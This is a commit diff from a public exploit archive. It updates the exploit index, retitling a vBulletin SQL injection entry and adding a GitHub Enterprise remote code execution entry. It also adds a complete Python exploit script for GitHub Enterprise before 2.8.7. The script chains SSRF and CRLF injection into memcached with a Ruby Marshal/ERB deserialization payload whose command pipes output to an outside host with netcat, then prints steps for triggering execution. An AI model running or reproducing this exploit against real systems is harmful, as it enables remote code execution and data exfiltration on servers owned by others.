DB: 2017-07-30

1 new exploits

vBulletin 4.2.3 - 'ForumRunner' SQL Injection
vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection

GitHub Enterprise < 2.8.7 - Remote Code Execution
This commit is contained in:
Offensive Security 2017-07-30 05:01:23 +00:00
parent fb7bed6364
commit 25e79a8750
2 changed files with 32 additions and 1 deletions

View file

@ -37434,7 +37434,7 @@ id,file,description,date,author,platform,type,port
40746,platforms/php/webapps/40746.php,"e107 CMS 2.1.2 - Privilege Escalation",2016-11-09,"Kacper Szurek",php,webapps,0
40749,platforms/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",php,webapps,80
40750,platforms/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,php,webapps,0
40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
40751,platforms/php/webapps/40751.txt,"vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0
@ -37914,6 +37914,7 @@ id,file,description,date,author,platform,type,port
41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
42392,platforms/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,multiple,webapps,0
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,30 @@
#!/usr/bin/python
from urllib import quote
''' set up the marshal payload from IRB
code = "`id | nc orange.tw 12345`"
p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult"
'''
marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'
payload = [
'',
'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code),
marshal_code,
'',
''
]
payload = map(quote, payload)
url = 'http://0:8000/composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/'
print "\nGitHub Enterprise < 2.8.7 Remote Code Execution by orange@chroot.org"
print '-'*10 + '\n'
print url + '%0D%0A'.join(payload)
print '''
Inserting WebHooks from:
https://ghe-server/:user/:repo/settings/hooks
Triggering RCE from:
https://ghe-server/search?q=ggggg&type=Repositories
'''